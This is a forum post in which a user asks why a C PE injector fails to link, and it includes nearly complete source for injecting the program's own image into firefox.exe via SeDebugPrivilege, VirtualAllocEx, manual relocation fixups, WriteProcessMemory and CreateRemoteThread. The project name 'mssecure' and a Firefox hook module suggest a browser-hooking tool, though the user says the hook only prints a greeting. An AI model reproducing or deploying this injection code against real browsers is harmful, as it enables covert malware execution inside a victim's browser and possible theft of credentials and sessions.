Jump to content
Hannock

unresolved external symbol referenced in function@0 , PE Injection

By Hannock, in Programare

Recommended Posts

Hannock Newbie

Hannock

Posted
Posted

So Good Morning,

I Coded a PE Injector last time, after several hicks however i managed to get it to work.

Now i have managed to make a C Program, nw i want to make use of another C++ program inside a C PE injector , unfortunately i get this kind of Error 

 

Quote

1>------ Build started: Project: mssecure, Configuration: Debug Win32 ------
1>  main.c
1>  FFInject.c
1>c:\users\XXXXXXXX\documents\visual studio 2013\projects\mssecure\mssecure\ffinject.c(20): warning C4101: 'dwSize' : unreferenced local variable
1>  Generating Code...
1>FFInject.obj : error LNK2019: unresolved external symbol "void __cdecl setFFHook(void)" (?setFFHook@@YAXXZ) referenced in function "unsigned long __stdcall ThreadProcFF(void)" (?ThreadProcFF@@YGKXZ)
1>C:\Users\XXXXXXXX\Documents\Visual Studio 2013\Projects\mssecure\Debug\mssecure.exe : fatal error LNK1120: 1 unresolved externals
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

 

Source code Looks like this  

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <tlhelp32.h>
#include <string.h>
#include "FFInject.h"
#include "request.h"
#include "FFhook.h"
DWORD WINAPI ThreadProcFF()
{
    setFFHook();
    return 0;
}
BOOL SetDebugPriviledge(BOOL State)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    DWORD dwSize;
    ZeroMemory(&tp, sizeof(tp));
    tp.PrivilegeCount = 1;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
    {
        return FALSE;
    }
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid))
    {
        CloseHandle(hToken);
    }
    if (State)
    {
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    }
    else
    {
        tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;
    }
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
    {
        CloseHandle(hToken);
    }
    return CloseHandle(hToken);
}
DWORD MyGetProcessId(LPCTSTR ProcessName)
{
    PROCESSENTRY32 pt;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pt.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hsnap, &pt)) {
        do {
            if (!lstrcmpi(pt.szExeFile, ProcessName)) {
                CloseHandle(hsnap);
                return pt.th32ProcessID;
            }
        } while (Process32Next(hsnap, &pt));
    }
    CloseHandle(hsnap);
    return 0;
}
void InjectFF()
{
    DWORD pid = MyGetProcessId(TEXT("firefox.exe"));
    PIMAGE_DOS_HEADER pIDH;
    PIMAGE_NT_HEADERS pINH;
    PIMAGE_BASE_RELOCATION pIBR;
    HANDLE hProcess, hThread;
    PUSHORT TypeOffset;
    PVOID ImageBase, Buffer, mem;
    ULONG i, Count, Delta, *p;
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);
    if (!hProcess)
    {
        printf("\nError: Unable to open target process (%u)\n", GetLastError());
        //return -1;
        //getchar();
    }
    ImageBase = GetModuleHandle(NULL);
    pIDH = (PIMAGE_DOS_HEADER)ImageBase;
    pINH = (PIMAGE_NT_HEADERS)((PUCHAR)ImageBase + pIDH->e_lfanew);
    mem = VirtualAllocEx(hProcess, NULL, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!mem)
    {
        printf("\nError: Unable to allocate memory in target process (%u)\n", GetLastError());
        CloseHandle(hProcess);
        getchar();
        //return 0;
    }
    Buffer = VirtualAlloc(NULL, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(Buffer, ImageBase, pINH->OptionalHeader.SizeOfImage);
    pIBR = (PIMAGE_BASE_RELOCATION)((PUCHAR)Buffer + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
    Delta = (ULONG)mem - (ULONG)ImageBase;
    while (pIBR->VirtualAddress)
    {
        if (pIBR->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION))
        {
            Count = (pIBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT);
            TypeOffset = (PUSHORT)(pIBR + 1);
            for (i = 0; i<Count; i++)
            {
                if (TypeOffset[i])
                {
                    p = (PULONG)((PUCHAR)Buffer + pIBR->VirtualAddress + (TypeOffset[i] & 0xFFF));
                    *p += Delta;
                }
            }
        }
        pIBR = (PIMAGE_BASE_RELOCATION)((PUCHAR)pIBR + pIBR->SizeOfBlock);
    }
    if (!WriteProcessMemory(hProcess, mem, Buffer, pINH->OptionalHeader.SizeOfImage, NULL))
    {
        printf("\nError: Unable to write process memory (%u)\n", GetLastError());
        VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        getchar();
        //return -1;
    }
    VirtualFree(Buffer, 0, MEM_RELEASE);
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)((PUCHAR)ThreadProcFF + Delta), NULL, 0, NULL);
    if (!hThread)
    {
        printf("\nError: Unable to create thread in target process (%u)\n", GetLastError());
        VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        //return -1;
        getchar();
    }
    WaitForSingleObject(hThread, INFINITE);
    VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
    CloseHandle(hProcess);
}

What do i seem to get wrongly here? The code in the Hook (setFFHook) is supposed to show Hello i am inside Firefox

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...